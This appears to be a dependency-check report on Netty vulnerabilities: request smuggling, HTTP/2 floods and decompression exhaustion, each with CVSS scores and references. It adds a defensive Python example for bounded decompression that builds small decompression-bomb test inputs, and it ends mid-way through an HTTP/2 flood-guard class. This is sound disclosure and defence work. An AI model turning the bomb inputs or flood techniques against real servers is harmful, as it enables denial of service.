- [zookeeper-dev] 20200204 Build failed in Jenkins: zookeeper-branch36-java8 #38
- [zookeeper-dev] 20200204 Build failed in Jenkins: zookeeper-master-maven-jdk11 #361
- [zookeeper-issues] 20200203 [jira] [Assigned] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445
- [zookeeper-issues] 20200203 [jira] [Commented] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445
- [zookeeper-issues] 20200203 [jira] [Created] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445
- [zookeeper-issues] 20200203 [jira] [Updated] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445
- [zookeeper-issues] 20200204 [jira] [Resolved] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445
- [zookeeper-issues] 20200209 [jira] [Commented] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445
- [zookeeper-issues] 20200209 [jira] [Updated] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445
- https://lists.apache.org/thread.html/r0f5e72d5f69b4720dfe64fcbc2da9afae949ed1e9cbffa84bb7d92d7%40%3Cnotifications.zookeeper.apache.org%3E
- https://lists.apache.org/thread.html/r310d2ce22304d5298ff87f10134f918c87919b452734f9841d95682d%40%3Ccommits.zookeeper.apache.org%3E
- https://lists.apache.org/thread.html/r4c675b2d0cc2a5e506b11ee10d60a378859ee340aca052e4c7ef4749%40%3Cnotifications.zookeeper.apache.org%3E
- https://lists.apache.org/thread.html/r819aaeb9944bdcfca438dcc51f05650dc728daf64dfd7d774fc2499b%40%3Ccommits.zookeeper.apache.org%3E
- https://lists.apache.org/thread.html/r91e0fa345c86c128b75a4a791b4b503b53173ff4c13049ac7129d319%40%3Cnotifications.zookeeper.apache.org%3E
- https://lists.apache.org/thread.html/r9b20cdac704cf9a583400350e2d5b576fa8417c18ddb961201676c60%40%3Ccommits.zookeeper.apache.org%3E
- https://lists.apache.org/thread.html/rb84c57670ec48ef23f4d07973b7fa69f629b8e7fcfb48874362feb6f%40%3Ccommits.zookeeper.apache.org%3E
- https://lists.apache.org/thread.html/rce71d33747010d32d31d90f5d737dae26291d96552f513a266c92fbb%40%3Cnotifications.zookeeper.apache.org%3E
- https://lists.apache.org/thread.html/rfb55f245b08d8a6ec0fb4dc159022227cd22de34c4419c2fbb18802b%40%3Cnotifications.zookeeper.apache.org%3E
- DEBIAN - DSA-4885
- MISC - https://github.com/netty/netty/compare/netty-4.1.43.Final...netty-4.1.44.Final
- MISC - https://github.com/netty/netty/issues/9866
- MLIST - [debian-lts-announce] 20200219 [SECURITY] [DLA 2109-1] netty security update
- MLIST - [debian-lts-announce] 20200219 [SECURITY] [DLA 2110-1] netty-3.9 security update
- MLIST - [debian-lts-announce] 20200904 [SECURITY] [DLA 2364-1] netty security update
- MLIST - [debian-lts-announce] 20200904 [SECURITY] [DLA 2365-1] netty-3.9 security update
- OSSINDEX - [CVE-2019-20444] CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
- OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-20444
- OSSIndex - https://github.com/netty/netty/issues/9866
- REDHAT - RHSA-2020:0497
- REDHAT - RHSA-2020:0567
- REDHAT - RHSA-2020:0601
- REDHAT - RHSA-2020:0605
- REDHAT - RHSA-2020:0606
- REDHAT - RHSA-2020:0804
- REDHAT - RHSA-2020:0805
- REDHAT - RHSA-2020:0806
- REDHAT - RHSA-2020:0811
- UBUNTU - USN-4532-1
Vulnerable Software & Versions:
CVE-2019-20445
HttpObjectDecoder.java in Netty before 4.1.44 allows a Content-Length header to be accompanied by a second Content-Length header, or by a Transfer-Encoding header.
CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2: Base Score: MEDIUM (6.4) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:N
CVSSv3: Base Score: CRITICAL (9.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
References:
- FEDORA-2020-66b5f85ccc - [bookkeeper-issues] 20200729 [GitHub] [bookkeeper] padma81 opened a new issue #2387: Security vulnerabilities in the apache/bookkeeper-4.9.2 image - [cassandra-commits] 20200218 [jira] [Created] (CASSANDRA-15590) Upgrade io.netty_netty-all dependency to fix security vulnerabilities - [cassandra-commits] 20200604 [jira] [Created] (CASSANDRA-15856) Security vulnerabilities with dependency jars of Cassandra 3.11.6 - [druid-commits] 20200131 [GitHub] [druid] ccaominh commented on a change in pull request #9300: Fix / suppress netty CVEs CVE-2019-20445 and CVE-2019-20444 - [druid-commits] 20200131 [GitHub] [druid] gianm merged pull request #9300: Fix / suppress netty CVEs CVE-2019-20445 and CVE-2019-20444 - [druid-commits] 20200131 [GitHub] [druid] zachjsh opened a new pull request #9300: Fix / suppress netty CVEs CVE-2019-20445 and CVE-2019-20444 - [flink-dev] 20200910 [jira] [Created] (FLINK-19195) question on security vulnerabilities in flink - [flink-issues] 20200910 [jira] [Created] (FLINK-19195) question on security vulnerabilities in flink - [flink-issues] 20210426 [jira] [Commented] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. 
thx - [flume-issues] 20200410 [jira] [Created] (FLUME-3363) CVE-2019-20445 - [flume-issues] 20200415 [jira] [Updated] (FLUME-3363) CVE-2019-20445 - [flume-issues] 20200422 [jira] [Commented] (FLUME-3363) CVE-2019-20445 - [geode-dev] 20200408 Proposal to bring GEODE-7969 to support/1.12 - [geode-dev] 20200408 Re: Proposal to bring GEODE-7969 to support/1.12 - [pulsar-commits] 20201215 [GitHub] [pulsar] yanshuchong opened a new issue #8967: CVSS issue list - [pulsar-commits] 20210120 [GitHub] [pulsar] fmiguelez opened a new issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444 - [pulsar-commits] 20210121 [GitHub] [pulsar] hpvd commented on issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444 - [pulsar-commits] 20210122 [GitHub] [pulsar] hpvd commented on issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444 - [spark-issues] 20200309 [jira] [Created] (SPARK-31095) Upgrade netty version to fix security vulnerabilities - [spark-issues] 20210824 [jira] [Created] (SPARK-36572) Upgrade version of io.netty to 4.1.44.Final to solve CVE-2019-20444 and CVE-2019-20445 - [spark-reviews] 20200310 [GitHub] [spark] dongjoon-hyun commented on issue #27870: [SPARK-31095][BUILD][2.4] Upgrade netty-all to 4.1.47.Final - [zookeeper-dev] 20200203 Re: [VOTE] Apache ZooKeeper release 3.6.0 candidate 1 - [zookeeper-dev] 20200203 [jira] [Created] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200203 [jira] [Assigned] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200203 [jira] [Commented] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200203 [jira] [Created] (ZOOKEEPER-3716) upgrade 
netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200203 [jira] [Updated] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200204 [jira] [Resolved] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200209 [jira] [Commented] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200209 [jira] [Updated] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - https://lists.apache.org/thread.html/r310d2ce22304d5298ff87f10134f918c87919b452734f9841d95682d%40%3Ccommits.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/r819aaeb9944bdcfca438dcc51f05650dc728daf64dfd7d774fc2499b%40%3Ccommits.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/r9b20cdac704cf9a583400350e2d5b576fa8417c18ddb961201676c60%40%3Ccommits.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/rb84c57670ec48ef23f4d07973b7fa69f629b8e7fcfb48874362feb6f%40%3Ccommits.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/rce71d33747010d32d31d90f5d737dae26291d96552f513a266c92fbb%40%3Cnotifications.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/rfb55f245b08d8a6ec0fb4dc159022227cd22de34c4419c2fbb18802b%40%3Cnotifications.zookeeper.apache.org%3E DEBIAN - DSA-4885 MISC - https://github.com/netty/netty/compare/netty-4.1.43.Final...netty-4.1.44.Final MISC - https://github.com/netty/netty/issues/9861 MLIST - [debian-lts-announce] 20200219 [SECURITY] [DLA 2109-1] netty security update MLIST - [debian-lts-announce] 20200219 [SECURITY] [DLA 2110-1] netty-3.9 security update MLIST - [debian-lts-announce] 20200904 [SECURITY] [DLA 2364-1] netty security update MLIST - [debian-lts-announce] 20200904 [SECURITY] [DLA 2365-1] netty-3.9 security update OSSINDEX - [CVE-2019-20445] CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') OSSIndex - 
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-20445 OSSIndex - https://github.com/netty/netty/issues/9861 OSSIndex - https://github.com/netty/netty/pull/9865 OSSIndex - https://lists.apache.org/thread.html/r70b1ff22ee80e8101805b9a473116dd33265709007d2deb6f8c80bf2@%3Ccommits.druid.apache.org%3E REDHAT - RHSA-2020:0497 REDHAT - RHSA-2020:0567 REDHAT - RHSA-2020:0601 REDHAT - RHSA-2020:0605 REDHAT - RHSA-2020:0606 REDHAT - RHSA-2020:0804 REDHAT - RHSA-2020:0805 REDHAT - RHSA-2020:0806 REDHAT - RHSA-2020:0811 UBUNTU - USN-4532-1 Vulnerable Software & Versions: (show all )
CVE-2019-16869
Netty before 4.1.42.Final mishandles whitespace before the colon in HTTP headers (such as a "Transfer-Encoding : chunked" line), which leads to HTTP request smuggling.
CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
References:
- [camel-commits] 20201120 [camel] branch camel-2.25.x updated: Updating Netty to 4.1.48.Final to fix some CVEs (e.g. CVE-2019-16869, CVE-2019-20444) - [cassandra-commits] 20191113 [jira] [Created] (CASSANDRA-15417) CVE-2019-16869(Netty is vulnerable to HTTP Request Smuggling) of severity 7.5 - [cassandra-commits] 20191113 [jira] [Created] (CASSANDRA-15418) CVE-2019-16869(Netty is vulnerable to HTTP Request Smuggling) of severity 7.5 for Cassendra 2.2.5 - [cassandra-commits] 20200218 [jira] [Created] (CASSANDRA-15590) Upgrade io.netty_netty-all dependency to fix security vulnerabilities - [cassandra-commits] 20200604 [jira] [Created] (CASSANDRA-15856) Security vulnerabilities with dependency jars of Cassandra 3.11.6 - [cassandra-commits] 20210526 [jira] [Created] (CASSANDRA-16699) Security vulnerability CVE-2020-7238 for Netty - [cassandra-commits] 20210526 [jira] [Updated] (CASSANDRA-16699) Security vulnerability CVE-2020-7238 for Netty - [cassandra-commits] 20210924 [jira] [Commented] (CASSANDRA-15417) CVE-2019-16869(Netty is vulnerable to HTTP Request Smuggling) of severity 7.5 - [cassandra-commits] 20210924 [jira] [Updated] (CASSANDRA-15417) CVE-2019-16869(Netty is vulnerable to HTTP Request Smuggling) of severity 7.5 - [drill-dev] 20191017 Dependencies used by Drill contain known vulnerabilities - [drill-dev] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities - [drill-issues] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities - [druid-commits] 20191115 [GitHub] [incubator-druid] ccaominh opened a new pull request #8878: Address security vulnerabilities - [druid-commits] 20200131 [GitHub] [druid] ccaominh commented on a change in pull request #9300: Fix / suppress netty CVEs CVE-2019-20445 and CVE-2019-20444 - [flink-dev] 20200910 [jira] [Created] (FLINK-19195) question on security vulnerabilities in flink - [flink-issues] 
20200910 [jira] [Created] (FLINK-19195) question on security vulnerabilities in flink - [hadoop-common-commits] 20200309 [hadoop] branch branch-3.1 updated: HADOOP-16871. Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444, CVE-2019-16869 - [hadoop-common-commits] 20200309 [hadoop] branch branch-3.2 updated: HADOOP-16871. Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444, CVE-2019-16869 - [hadoop-common-commits] 20200309 [hadoop] branch trunk updated: HADOOP-16871. Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444, CVE-2019-16869 - [hadoop-common-issues] 20200219 [jira] [Assigned] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [hadoop-common-issues] 20200219 [jira] [Updated] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444, - [hadoop-common-issues] 20200219 [jira] [Updated] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [hadoop-common-issues] 20200224 [jira] [Commented] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [hadoop-common-issues] 20200225 [jira] [Commented] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [hadoop-common-issues] 20200309 [jira] [Commented] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [hadoop-common-issues] 20200309 [jira] [Updated] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [hadoop-common-issues] 20200310 [jira] [Commented] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [olingo-dev] 20191206 [jira] [Assigned] (OLINGO-1414) Dependency check fails on 4.7.0 : CVE-2019-16869 on Netty - [olingo-dev] 20191206 [jira] [Commented] (OLINGO-1414) Dependency check fails on 4.7.0 : CVE-2019-16869 on Netty - [olingo-dev] 20191206 [jira] [Created] 
(OLINGO-1414) Dependency check fails on 4.7.0 : CVE-2019-16869 on Netty - [olingo-dev] 20191206 [jira] [Resolved] (OLINGO-1414) Dependency check fails on 4.7.0 : CVE-2019-16869 on Netty - [olingo-dev] 20191206 [jira] [Updated] (OLINGO-1414) Dependency check fails on 4.7.0 : CVE-2019-16869 on Netty - [olingo-dev] 20191209 [jira] [Commented] (OLINGO-1414) Dependency check fails on 4.7.0 : CVE-2019-16869 on Netty - [olingo-dev] 20191227 [jira] [Commented] (OLINGO-1414) Dependency check fails on 4.7.0 : CVE-2019-16869 on Netty - [pulsar-commits] 20201215 [GitHub] [pulsar] yanshuchong opened a new issue #8967: CVSS issue list - [pulsar-commits] 20210120 [GitHub] [pulsar] fmiguelez opened a new issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444 - [pulsar-commits] 20210121 [GitHub] [pulsar] hpvd commented on issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444 - [pulsar-commits] 20210122 [GitHub] [pulsar] hpvd commented on issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444 - [rocketmq-dev] 20201224 [GitHub] [rocketmq] codecov-io commented on pull request #2517: fix CVE-2019-16869, CVE-2018-8020 - [rocketmq-dev] 20201224 [GitHub] [rocketmq] coveralls commented on pull request #2517: fix CVE-2019-16869, CVE-2018-8020 - [rocketmq-dev] 20201224 [GitHub] [rocketmq] crazywen opened a new pull request #2517: fix CVE-2019-16869, CVE-2018-8020 - [spark-issues] 20191219 [jira] [Commented] (SPARK-30308) Update Netty and Netty-all to address CVE-2019-16869 - [spark-issues] 20191219 [jira] [Created] (SPARK-30308) Update Netty and Netty-all to address CVE-2019-16869 - [spark-issues] 20191219 [jira] [Updated] (SPARK-30308) Update Netty and Netty-all to address CVE-2019-16869 - [spark-issues] 20191220 [jira] [Comment Edited] 
(SPARK-30308) Update Netty and Netty-all to address CVE-2019-16869 - [spark-issues] 20191220 [jira] [Commented] (SPARK-30308) Update Netty and Netty-all to address CVE-2019-16869 - [spark-issues] 20191220 [jira] [Issue Comment Deleted] (SPARK-30308) Update Netty and Netty-all to address CVE-2019-16869 - [spark-issues] 20191220 [jira] [Reopened] (SPARK-30308) Update Netty and Netty-all to address CVE-2019-16869 - [spark-issues] 20191220 [jira] [Resolved] (SPARK-30308) Update Netty and Netty-all to address CVE-2019-16869 - [tinkerpop-commits] 20191022 [tinkerpop] branch tp34 updated: Bump to Netty 4.1.42 fixes CVE-2019-16869 - CTR - [zookeeper-commits] 20191003 [zookeeper] branch branch-3.5 updated: ZOOKEEPER-3563: Update Netty to fix CVE-2019-16869 - [zookeeper-commits] 20191003 [zookeeper] branch branch-3.5.6 updated: ZOOKEEPER-3563: Update Netty to fix CVE-2019-16869 - [zookeeper-commits] 20191003 [zookeeper] branch master updated: ZOOKEEPER-3563: Update Netty to address CVE-2019-16869 - [zookeeper-dev] 20190930 Re: [VOTE] Apache ZooKeeper release 3.5.6 candidate 2 - [zookeeper-dev] 20190930 [jira] [Created] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - netty-3.10.6.Final.jar: CVE-2019-16869 - [zookeeper-dev] 20191001 Re: [VOTE] Apache ZooKeeper release 3.5.6 candidate 2 - [zookeeper-dev] 20191002 Re: [VOTE] Apache ZooKeeper release 3.5.6 candidate 2 - [zookeeper-issues] 20190930 [jira] [Commented] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - CVE-2019-16869 on Netty - [zookeeper-issues] 20190930 [jira] [Created] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - netty-3.10.6.Final.jar: CVE-2019-16869 - [zookeeper-issues] 20190930 [jira] [Updated] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - CVE-2019-16869 on Netty - [zookeeper-issues] 20190930 [jira] [Updated] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - netty with CVE-2019-16869 - [zookeeper-issues] 
20191001 [jira] [Commented] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - CVE-2019-16869 on Netty - [zookeeper-issues] 20191003 [jira] [Commented] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - CVE-2019-16869 on Netty - [zookeeper-issues] 20191008 [jira] [Commented] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - CVE-2019-16869 on Netty - [zookeeper-issues] 20191008 [jira] [Resolved] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - CVE-2019-16869 on Netty BUGTRAQ - 20200105 [SECURITY] [DSA 4597-1] netty security update DEBIAN - DSA-4597 MISC - https://github.com/netty/netty/compare/netty-4.1.41.Final...netty-4.1.42.Final MISC - https://github.com/netty/netty/issues/9571 MLIST - [debian-lts-announce] 20190930 [SECURITY] [DLA 1941-1] netty security update MLIST - [debian-lts-announce] 20200219 [SECURITY] [DLA 2110-1] netty-3.9 security update MLIST - [debian-lts-announce] 20200904 [SECURITY] [DLA 2365-1] netty-3.9 security update OSSINDEX - [CVE-2019-16869] CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-16869 OSSIndex - https://github.com/netty/netty/issues/9571 REDHAT - RHSA-2019:3892 REDHAT - RHSA-2019:3901 REDHAT - RHSA-2020:0159 REDHAT - RHSA-2020:0160 REDHAT - RHSA-2020:0161 REDHAT - RHSA-2020:0164 REDHAT - RHSA-2020:0445 UBUNTU - USN-4532-1 Vulnerable Software & Versions: (show all )
CVE-2019-9512 (OSSINDEX)
Some HTTP/2 implementations are vulnerable to ping floods, potentially leading to a denial of service. The attacker sends continual pings to an HTTP/2 peer, causing the peer to build an internal queue of responses. Depending on how efficiently this data is queued, this can consume excess CPU, memory, or both.
CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv2 (as reported by OSSIndex): Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:/C:N/I:N/A:H
Note: this vector, repeated on the three OSSIndex entries that follow, is not well-formed CVSSv2 (the Au: metric carries no value and A:H is a CVSSv3 impact level), and 7.5 is the CVSSv3 base score NVD publishes for these four HTTP/2 DoS issues. Treat the "CVSSv2" label as a reporting artifact and rate them as CVSSv3 7.5 HIGH.
References: none listed in the report
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:io.netty:netty-codec-http2:4.1.38.Final:*:*:*:*:*:*:*
CVE-2019-9514 (OSSINDEX)
Some HTTP/2 implementations are vulnerable to a reset flood, potentially leading to a denial of service. The attacker opens a number of streams and sends an invalid request over each stream that should solicit a stream of RST_STREAM frames from the peer. Depending on how the peer queues the RST_STREAM frames, this can consume excess memory, CPU, or both.
CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv2 (as reported by OSSIndex, see the note on CVE-2019-9512): Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:/C:N/I:N/A:H
References: none listed in the report
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:io.netty:netty-codec-http2:4.1.38.Final:*:*:*:*:*:*:*
CVE-2019-9515 (OSSINDEX)
Some HTTP/2 implementations are vulnerable to a settings flood, potentially leading to a denial of service. The attacker sends a stream of SETTINGS frames to the peer. Since the RFC requires that the peer reply with one acknowledgement per SETTINGS frame, an empty SETTINGS frame is almost equivalent in behavior to a ping. Depending on how efficiently this data is queued, this can consume excess CPU, memory, or both.
CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv2 (as reported by OSSIndex, see the note on CVE-2019-9512): Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:/C:N/I:N/A:H
References: none listed in the report
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:io.netty:netty-codec-http2:4.1.38.Final:*:*:*:*:*:*:*
CVE-2019-9518 (OSSINDEX)
Some HTTP/2 implementations are vulnerable to a flood of empty frames, potentially leading to a denial of service. The attacker sends a stream of frames with an empty payload and without the end-of-stream flag. These frames can be DATA, HEADERS, CONTINUATION and/or PUSH_PROMISE. The peer spends time processing each frame disproportionate to attack bandwidth. This can consume excess CPU.
CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv2 (as reported by OSSIndex, see the note on CVE-2019-9512): Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:/C:N/I:N/A:H
References: none listed in the report
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:io.netty:netty-codec-http2:4.1.38.Final:*:*:*:*:*:*:*
CVE-2020-11612
The ZlibDecoders in Netty 4.1.x before 4.1.46 allow for unbounded memory allocation while decoding a ZlibEncoded byte stream. An attacker could send a large ZlibEncoded byte stream to the Netty server, forcing the server to allocate all of its free memory to a single decoder.
CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References: none listed in the report
Vulnerable Software & Versions:
CVE-2021-37136
The Bzip2 decompression decoder (Bzip2Decoder) does not allow setting a size restriction on the decompressed output data, which also governs the allocation size used during decompression. All users of Bzip2Decoder are affected: malicious input can trigger an OutOfMemoryError and therefore a denial of service.
CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References: none listed in the report
Vulnerable Software & Versions:
CVE-2021-37137
The Snappy frame decoder does not restrict the chunk length, which may lead to excessive memory usage. It may also buffer reserved skippable chunks until the whole chunk has been received, which can likewise consume excessive memory. The issue can be triggered by supplying input that decompresses to a very large size (via a network stream or a file) or by sending a huge skippable chunk.
CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References: none listed in the report
Vulnerable Software & Versions:
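The three decoder issues above (CVE-2020-11612 for zlib, CVE-2021-37136 for bzip2, CVE-2021-37137 for Snappy) share one root cause: the size of the decompressed output is decided by the sender's stream, not by the receiver. The following is an added example, not code from this report or from Netty, showing the bounding pattern in Python with the standard library's zlib and bz2 decompressors, both of which accept a max_length argument. The 1 MiB cap and the sample streams are constructed for the illustration; Snappy is left out only because the standard library has no decoder for it, the same loop applies.

```python
import bz2
import zlib


class DecompressionBomb(ValueError):
    """The decompressed output would exceed the caller's cap."""


def inflate_bounded(data, max_out):
    """Inflate a complete zlib stream without ever holding more than
    max_out + 1 bytes of output (the extra byte is how overflow is detected)."""
    d = zlib.decompressobj()
    out = bytearray()
    pending = data
    while pending:
        budget = max_out - len(out)                  # never negative here
        # max_length caps this call's output; input that would produce
        # more is left in d.unconsumed_tail instead of being expanded.
        out += d.decompress(pending, budget + 1)
        if len(out) > max_out:
            raise DecompressionBomb("zlib output exceeds %d bytes" % max_out)
        pending = d.unconsumed_tail
    if not d.eof:
        raise ValueError("truncated zlib stream")
    return bytes(out)


def bunzip_bounded(data, max_out):
    """Same pattern for bzip2; its decompressor signals further pending
    output with needs_input == False instead of an unconsumed tail."""
    d = bz2.BZ2Decompressor()
    out = bytearray(d.decompress(data, max_out + 1))
    while not d.eof and not d.needs_input:
        if len(out) > max_out:
            raise DecompressionBomb("bzip2 output exceeds %d bytes" % max_out)
        out += d.decompress(b"", max_out + 1 - len(out))
    if len(out) > max_out:
        raise DecompressionBomb("bzip2 output exceeds %d bytes" % max_out)
    if not d.eof:
        raise ValueError("truncated bzip2 stream")
    return bytes(out)


def rejects(decode, data, max_out):
    """True if decode() refuses the stream under the cap, False if it decodes."""
    try:
        decode(data, max_out)
    except DecompressionBomb:
        return True
    return False


# Constructed inputs for the demonstration (not real traffic).
MAX_OUT = 1024 * 1024                             # 1 MiB cap: an illustrative choice
LEGIT = b"GET /index.html HTTP/1.1\r\n" * 64      # a normal, small payload
BOMB_PLAIN = bytes(8 * MAX_OUT)                   # 8 MiB of zeros ...
ZLIB_BOMB = zlib.compress(BOMB_PLAIN)             # ... arrives as roughly 8 KB of zlib
BZ2_BOMB = bz2.compress(BOMB_PLAIN)               # ... or a few hundred bytes of bzip2

if __name__ == "__main__":
    print("zlib legit :", inflate_bounded(zlib.compress(LEGIT), MAX_OUT) == LEGIT)
    print("zlib bomb  :", "rejected" if rejects(inflate_bounded, ZLIB_BOMB, MAX_OUT) else "accepted")
    print("bzip2 bomb :", "rejected" if rejects(bunzip_bounded, BZ2_BOMB, MAX_OUT) else "accepted")
    print("bomb sizes : %d zlib bytes, %d bzip2 bytes" % (len(ZLIB_BOMB), len(BZ2_BOMB)))
```

The important property is that the cap is enforced per call, before the next chunk of output is allocated, so the process never commits more than max_out plus one byte no matter what the stream claims. A decoder that only checks the total after decompressing has already lost.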
CVE-2022-41881
The Netty project is an event-driven asynchronous network application framework. In versions prior to 4.1.86.Final, a StackOverflowError can be raised when parsing a malformed crafted message due to an infinite recursion. This issue is patched in version 4.1.86.Final. There is no workaround, except using a custom HaProxyMessageDecoder.
CWE-674 Uncontrolled Recursion
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References: none listed in the report
Vulnerable Software & Versions:
CVE-2023-44487
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.
CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References: none listed in the report
Vulnerable Software & Versions:
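The five HTTP/2 findings in this report (CVE-2019-9512, CVE-2019-9514, CVE-2019-9515, CVE-2019-9518 and CVE-2023-44487) are variants of one problem: a peer can send frames that cost the server work but never advance a request. What follows is an added example, not code from the report or from Netty, of the per-connection accounting a server needs to close such connections early: a counter of consecutive frames that make no progress (covering the 2019 ping, settings and empty-frame floods) and a sliding window of RST_STREAM frames, whether received (rapid reset) or provoked and sent by this side (reset flood). The thresholds, the frame tuples and the SimClock are assumptions made for the illustration.

```python
import time
from collections import deque


class FloodGuard:
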